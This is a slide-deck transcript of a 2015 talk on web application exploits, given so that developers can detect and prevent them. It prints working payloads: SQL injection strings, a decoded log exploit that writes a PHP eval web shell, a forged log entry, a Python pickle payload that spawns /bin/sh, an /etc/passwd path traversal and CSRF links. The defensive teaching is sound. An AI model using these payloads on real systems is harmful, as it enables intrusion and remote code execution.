Upgrade to Pro — share decks privately, control downloads, hide ads and more …

App Exploits: Deconstructing for Good, Not Evil

Joël Perras
February 20, 2015
Technology
0
80

App Exploits: Deconstructing for Good, Not Evil

If your web application exists on the public Internet, someone *will* try to exploit it.
Many of these are un-targeted & scripted, their authors hoping that their target will fall to one of the hundreds of un-patched vulnerabilities in frameworks, blog engines or storefronts. Let's go through some common and uncommon exploits in the wild, starting from their traces in server logs, and see how we can detect them and better protect ourselves.

Joël Perras

February 20, 2015
Tweet

More Decks by Joël Perras

See All by Joël Perras
Run Absolutely Everything* With uWSGI
jperras
0
350
An Introduction to Configuration Management with SaltStack
jperras
1
350
Large-Scale Applications with Flask: Doing More With Less
jperras
29
3.9k
Graphs, Edges & Nodes: Untangling the Social Web
jperras
8
790

Other Decks in Technology

See All in Technology
カオナビの利用実績をアウトカムへつなげる旅 / example-of-data-management-startup-in-kaonavi
kaonavi
0
130
ゼロから始めるVue.jsコミュニティ貢献 / first-vuejs-community-contribution-link-and-motivation
lmi
0
100
DevOpsメトリクスとアウトカムの接続にトライ!開発プロセスを通して計測できるメトリクスの活用方法
ham0215
2
230
DevOpsDays History and my DevOps story
kawaguti
PRO
9
2.4k
検証を通して見えてきたTiDBの性能特性
lycorptech_jp
PRO
6
3.7k
SPI原点回帰論:事業課題とFour Keysの結節点を見出す実践的ソフトウェアプロセス改善 / DevOpsDays Tokyo 2024
visional_engineering_and_design
4
1.9k
Delivering Millions of Messages within seconds @ Duolingo
pelelgrino
0
340
レガシーをぶっ壊せ。AEONで始めるDevRelの話 / Qiita Night 2024-2-22
aeonpeople
3
1.2k
テストプロセスで大事にしていること #jasstnano
makky_tyuyan
0
160
反実仮想機械学習とは何か
usaito
PRO
8
3k
JSON攻略法.pdf
miyakemito
8
4.8k
Tellus の衛星データを見てみよう #mf_fukuoka
kongmingstrap
0
100

Featured

See All Featured
RailsConf 2023
tenderlove
3
540
A designer walks into a library…
pauljervisheath
200
23k
What the flash - Photography Introduction
edds
64
11k
No one is an island. Learnings from fostering a developers community.
thoeni
16
2.1k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
659
120k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
34
8.9k
10 Git Anti Patterns You Should be Aware of
lemiorhan
648
58k
The Pragmatic Product Professional
lauravandoore
25
5.8k
Atom: Resistance is Futile
akmur
259
25k
Put a Button on it: Removing Barriers to Going Fast.
kastner
58
3k
How to train your dragon (web standard)
notwaldorf
73
5.2k
Build The Right Thing And Hit Your Dates
maggiecrowley
24
2k

Transcript

  1. App Exploits DECONSTRUCTED – FOR GOOD, NOT FOR EVIL. By

    Joël, from Fictive Kin

  2. Not if, but when. IT’S ONLY A MATTER OF TIME

  3. A long time ago, IN A HOTEL FAR, FAR AWAY…

  4. None

  5. Of course, he obviously tried to just use any (valid)

    room number with a generic name.

  6. 201 Smith

  7. Overly verbose error messages are the best friend of any

    attacker.

  8. 201 Smith Please verify with the front desk your room

    has been properly checked in and your last name correctly spelled in the hotel registration system.

  9. “Please verify with the front desk your room has been

    properly checked in and your last name correctly spelled in the hotel registration system.”

  10. SELECT  COUNT(id)   FROM  current_guests   WHERE  room_number  =  201

      AND  guest_last_name  =  ‘Smith’;

  11. WHERE  A  AND  B

  12. WHERE  A  AND  B  OR  True

  13. WHERE  (A  AND  B)  OR  True

  14. SELECT  COUNT(id)   FROM  current_guests   WHERE  room_number  =  201

      AND  guest_last_name  =  ‘lolpwned’   OR  1=1;

  15. 201 ‘ OR 1=1;

  16. The lesson here is… DON’T BE LAZY.

  17. The lesson here is… SECURITY IS HARD.

  18. The lesson here is… THAT THERE ARE MANY LESSONS.

  19. Injection Serialization Path Traversal Cross Site Scripting Cross Site Request

    Forgery

  20. Injection Attacks COME IN MANY FLAVOURS

  21. SQL INJECTIONS SANITIZE YOUR INPUTS

  22. 10.58.17.55  -­‐  -­‐  [20/Feb/2015:16:19:35  +0000]  "GET  /page?product_id=arrs1%5B%5D%3D99%26arrs1%5B%5D %3D102%26arrs1%5B%5D%3D103%26arrs1%5B%5D%3D95%26arrs1%5B%5D%3D100%26arrs1%5B%5D%3D98%26arrs1%5B%5D %3D112%26arrs1%5B%5D%3D114%26arrs1%5B%5D%3D101%26arrs1%5B%5D%3D102%26arrs1%5B%5D%3D105%26arrs1%5B%5D %3D120%26arrs2%5B%5D%3D109%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D97%26arrs2%5B%5D

    %3D103%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D114%26arrs2%5B%5D%3D109%26arrs2%5B%5D %3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D41%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D86%26arrs2%5B%5D%3D65%26arrs2%5B%5D%3D76%26arrs2%5B%5D%3D85%26arrs2%5B%5D %3D69%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D49%26arrs2%5B%5D%3D50%26arrs2%5B%5D %3D51%26arrs2%5B%5D%3D52%26arrs2%5B%5D%3D53%26arrs2%5B%5D%3D54%26arrs2%5B%5D%3D44%26arrs2%5B%5D %3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D123%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D %3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D125%26arrs2%5B%5D%3D102%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D108%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D95%26arrs2%5B%5D%3D99%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D40%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D120%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D118%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D46%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D60%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D118%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D108%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D36%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D80%26arrs2%5B%5D %3D79%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D84%26arrs2%5B%5D%3D91%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D105%26arrs2%5B%5D %3D93%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D62%26arrs2%5B%5D %3D120%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D %3D123%26arrs2%5B%5D%3D47%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D100%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D%3D112%26arrs2%5B%5D %3D125%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D35%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96…

  23. 10.58.17.55  -­‐  -­‐  [20/Feb/2015:16:19:35  +0000]  "GET  /page?product_id=arrs1%5B%5D%3D99%26arrs1%5B%5D %3D102%26arrs1%5B%5D%3D103%26arrs1%5B%5D%3D95%26arrs1%5B%5D%3D100%26arrs1%5B%5D%3D98%26arrs1%5B%5D %3D112%26arrs1%5B%5D%3D114%26arrs1%5B%5D%3D101%26arrs1%5B%5D%3D102%26arrs1%5B%5D%3D105%26arrs1%5B%5D %3D120%26arrs2%5B%5D%3D109%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D97%26arrs2%5B%5D

    %3D103%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D114%26arrs2%5B%5D%3D109%26arrs2%5B%5D %3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D41%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D86%26arrs2%5B%5D%3D65%26arrs2%5B%5D%3D76%26arrs2%5B%5D%3D85%26arrs2%5B%5D %3D69%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D49%26arrs2%5B%5D%3D50%26arrs2%5B%5D %3D51%26arrs2%5B%5D%3D52%26arrs2%5B%5D%3D53%26arrs2%5B%5D%3D54%26arrs2%5B%5D%3D44%26arrs2%5B%5D %3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D123%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D %3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D125%26arrs2%5B%5D%3D102%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D108%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D95%26arrs2%5B%5D%3D99%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D40%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D120%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D118%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D46%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D60%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D118%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D108%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D36%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D80%26arrs2%5B%5D %3D79%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D84%26arrs2%5B%5D%3D91%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D105%26arrs2%5B%5D %3D93%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D62%26arrs2%5B%5D %3D120%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D %3D123%26arrs2%5B%5D%3D47%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D100%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D%3D112%26arrs2%5B%5D %3D125%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D35%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96…

  24. arrs1%5B%5D%3D99 URLENCODED

  25. arrs1[]=99 QUERY ARGS ARE KEY/VAL PAIRS OF ARRAYS AND INTEGERS

  26. arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[] =112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109 &arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[ ]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&a rrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[] =110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100& arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=8 5&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=50&arrs2[]=51&arrs2[]= 52&arrs2[]=53&arrs2[]=54&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[] =39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arr

    s2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]= 125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&a rrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[] =116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&a rrs2[]=39&arrs2[]=120&arrs2[]=115&arrs2[]=118&arrs2[]=105&arrs2[]=112&arrs2[ ]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&ar rs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=11 2&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2 []=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs 2[]=120&arrs2[]=105&arrs2[]=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]= 93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=120&arrs2[]=105&arrs2 []=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]=39&arrs2[]=39&arrs2[]=41& arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[ ]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39& arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92 &arrs2[]=39&arrs2[]=96

  27. arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[] =112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109 &arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[ ]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&a rrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[] =110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100& arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=8 5&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=50&arrs2[]=51&arrs2[]= 52&arrs2[]=53&arrs2[]=54&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[] =39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arr

    s2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]= 125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&a rrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[] =116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&a rrs2[]=39&arrs2[]=120&arrs2[]=115&arrs2[]=118&arrs2[]=105&arrs2[]=112&arrs2[ ]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&ar rs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=11 2&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2 []=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs 2[]=120&arrs2[]=105&arrs2[]=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]= 93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=120&arrs2[]=105&arrs2 []=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]=39&arrs2[]=39&arrs2[]=41& arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[ ]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39& arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92 &arrs2[]=39&arrs2[]=96

  28. 99,  102,  103,  95,  100,  98,  112,  114,  101,  102,

      105,  120,  109,  121,  116,  97,  103,  96,  32,  40,   97,  105,  100,  44,  101,  120,  112,  98,  111,  100,   121,  44,  110,  111,  114,  109,  98,  111,  100,   121,  41,  32,  86,  65,  76,  85,  69,  83,  40,  49,   50,  51,  52,  53,  54,  44,  64,  96,  92,  39,  96,   44,  39,  123,  100,  101,  100,  101,  58,  112,  104,   112,  125,  102,  105,  108,  101,  95,  112,  117,   116,  95,  99,  111,  110,  116,  101,  110,  116,   115,  40,  39,  39,  120,  115,  118,  105,  112,  46,   112,  104,  112,  39,  39,  44,  39,  39,  60,  63,   112,  104,  112,  32,  101,  118,  97,  108,  40,  36,   95,  80,  79,  83,  84,  91,  120,  105,  110,  115,   117,  105,  93,  41,  59,  63,  62,  120,  105,  110,   115,  117,  105,  39,  39,  41,  59,  123,  47,  100,   101,  100,  101,  58,  112,  104,  112,  125,  39,  41,   32,  35,  32,  64,  96,  92,  39,  96

  29. In  [1]:  input  =  "arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95…"   In  [2]:  parsed  =

     input.split('&')   In  [3]:  v  =  [int(p.split('=')[1])  for  p  in  parsed  if  p  is  not  '']   In  [4]:  print  ''.join(chr(i)  for  i  in  v)  

  30. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  31. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  32. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  33. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  34. None

  35. In Communist China, CMS HACK YOU!

  36. The lesson here is… SANITIZE YOUR INPUTS! ESCAPE YOUR OUTPUTS!

  37. EX POST FACTO DETECTION LOG INVALID DATABASE QUERIES.

  38. LOG INJECTIONS COVERING UP THE DETAILS

  39. def  log_failed_login(username):          with  open("access.log",  'a')  as

     f:                  f.write("User  login  failed  for:  %s\n"  %  username)  

  40. guest\nUser  login  succeeded  for:  admin Here’s my username

  41. User  login  failed  for:  guest\n   User  login  succeeded  for:

     admin\n

  42. The lesson here is… SANITIZE YOUR INPUTS! ESCAPE YOUR OUTPUTS!

  43. Serialization Attacks …ALSO COME IN SEVERAL FLAVOURS.

  44. Object Serialization DON’T TRUST YOUR OWN CACHE

  45. <?php   $messages  =  array("sekret"  =>  ‘blue’);   echo  serialize($messages);

      ?>

  46. a:1:{s:6:"sekret";s:4:"blue";}

  47. PHP unserialize() can instantiate objects. Serializing objects containing user input

    is, fundamentally, dangerous.

  48. Magic Methods will be your downfall __wakeup(), __destruct()

  49. http://www.slideshare.net/phdays/php-wordpress

  50. http://www.slideshare.net/phdays/php-wordpress

  51. http://www.slideshare.net/phdays/php-wordpress

  52. Object Serialization …IN YOUR COOKIES.

  53. People forget that users can (sometimes) modify cookies $_COOKIE

  54. a:2:{s:2:"id";s:1:"1";s:4:"name";s:4:"Joel";} array("id" => '1', 'name' => 'Joel')

  55. PHP is not Alone PYTHON cPICKLE HAS SIMILAR ISSUES

  56. class AuthedProtocol(protocol.Protocol): def verify(self, headers): try: token = cPickle.loads(base64.b64decode(headers['AuthToken'])) if

    not check_hmac(token['signature'], token['data'], getSecretKey()): raise SomeError self.secure_data = token['data'] except: raise SomeError

  57. class AuthedProtocol(protocol.Protocol): def verify(self, headers): try: token = cPickle.loads(base64.b64decode(headers['AuthToken'])) if

    not check_hmac(token['signature'], token['data'], getSecretKey()): raise SomeError self.secure_data = token['data'] except: raise SomeError

  58. import cPickle, subprocess, base64 class Hackzor(object): def __reduce__(self): return (subprocess.Popen,

    (('/bin/sh',),))

  59. AuthToken: Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKChTJy9iaW4vc2gnCnAyCnRwMwp0cDQKUnA1Ci4= base64.b64encode(cPickle.dumps(RunBinSh()))

  60. Path Traversals FILES THAT SHOULDN’T BE SEEN

  61. $pdf  =  $_GET[‘pdf’];   $filename  =  “/var/www/$pdf”;   readfile($filename);

  62. GET /documents?pdf=../../etc/passwd

  63. $pdf  =  $_GET[‘pdf’];   $filename  =  “/var/www/../../etc/passwd”;   readfile($filename);

  64. The lesson here is… SANITIZE YOUR INPUTS! LIMIT SURFACE AREA

    (open_basedir etc.) PERMISSIONS MEAN THINGS! CHROOT IS YOUR FRIEND!

  65. CSRF …OR WHEN EVERYONE LIKED HAVING SEX WITH GOATS ON

    TWITTER
  66. None

  67. CSRF requires some social engineering “Hey, click this link for

    free money!”

  68. href=“/status?update=LOLPWNED”

  69. href=“/account?transfer=1billion&to=jperras”

  70. The lesson here is… USE CSRF TOKENS PER REQUEST! Access-Control-Allow-Origin!

  71. What’s a developer to do?

  72. Logging, logging, logging Intrusion Detection System (IDS) Security Mailing Lists

    Error notification systems (Sentry) … try to be smarter

  73. @jperras Joël Perras http://nerderati.com

  74. joind.in/13329